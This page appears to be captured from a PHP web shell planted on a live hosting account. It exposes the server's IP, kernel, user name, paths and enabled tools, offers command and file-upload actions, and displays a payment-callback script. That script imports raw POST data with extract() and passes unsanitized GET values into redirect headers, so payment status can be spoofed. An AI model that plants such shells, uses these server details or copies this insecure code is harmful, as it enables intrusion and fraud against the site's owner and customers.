Server IP : 103.53.40.154 / Your IP : 3.145.61.199 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/deergham.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); ?> <?php // $insertedId=$_POST['payment_request_id']; // $offer_rate=$_POST['amount']; // $transactionId=$_POST['transaction_id']; @extract($_POST); $insertedId=$_GET['payment_request_id']; // print_r($_POST);exit; if($_POST['code']=='PAYMENT_ERROR'){ header("location: failed.html?inserted_id=$insertedId"); exit; } else{ $insertedId=$_GET['payment_request_id']; $offer_rate=$_GET['amount']; $transactionId=$_GET['transaction_id']; header("location:https://www.deergham.com/thanks.php?payment_request_id=$insertedId&amount=$offer_rate&transaction_id=$transactionId&ord_payment_gateway=PhonePe"); exit; } ?>